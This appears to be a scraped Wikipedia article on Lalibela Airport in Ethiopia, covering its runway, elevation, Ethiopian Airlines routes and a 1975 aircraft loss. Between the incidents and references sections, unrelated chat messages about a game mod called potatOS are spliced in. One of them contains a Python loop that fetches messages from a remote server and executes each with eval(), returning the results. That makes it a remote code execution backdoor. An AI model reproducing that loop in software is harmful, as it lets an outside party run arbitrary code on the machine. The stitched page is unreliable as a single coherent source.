Lalibela Airport
Lalibela Airport (IATA: LLI, ICAO: HALL) is an airport serving Lalibela,[2] a city in the Amhara Region of Ethiopia. The name of the city and airport may also be transliterated as Lalibella.[3] The airport is located 23 km (14 miles) southwest of the city.[1]
Lalibela Airport | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|
![]() | |||||||||||
Summary | |||||||||||
Airport type | Public | ||||||||||
Operator | Ethiopian Airports Enterprise | ||||||||||
Serves | Lalibela, Ethiopia | ||||||||||
Elevation AMSL | 1,958 m / 6,424 ft | ||||||||||
Coordinates | 11°58′26″N 038°59′28″E | ||||||||||
Map | |||||||||||
![]() ![]() HALL Location in Ethiopia (Amhara region in red) | |||||||||||
Runways | |||||||||||
| |||||||||||
Facilities
The Lalibela Airport resides at an elevation of 1,958 metres (6,424 ft) above mean sea level.[2] It has one runway designated 10/28, with an asphalt surface measuring 2,400 by 53 metres (7,874 ft × 174 ft).[1][2]
The main runway was rebuilt in 1997, at a cost of 53 million birr.[4]
Airlines and destinations
Airlines | Destinations |
---|---|
Ethiopian Airlines[5] | Addis Ababa, Axum, Bahir Dar, Gondar |
Airports and incidents
On 14 March 1975, Douglas C-47 ET-ABR of Ethiopian Airlines was destroyed on the ground during a clash with rebels.[6]
gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
References
- "Lalibela Airport". Ethiopian Airports Enterprise. Archived from the original on 8 August 2012.
- Airport information for HALL from DAFIF (effective October 2006)
- Airport information for LLI at Great Circle Mapper. Source: DAFIF (effective October 2006).
- "Monthly Situation Report for Ethiopia". UNDP Emergencies Unit for Ethiopia (UNDP-EUE). August 1997. Retrieved 20 January 2009.
- "Domestic Route Map". Ethiopian Airlines.
- "ET-ABR Accident description". Aviation Safety Network. Retrieved 20 August 2010.
External links
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.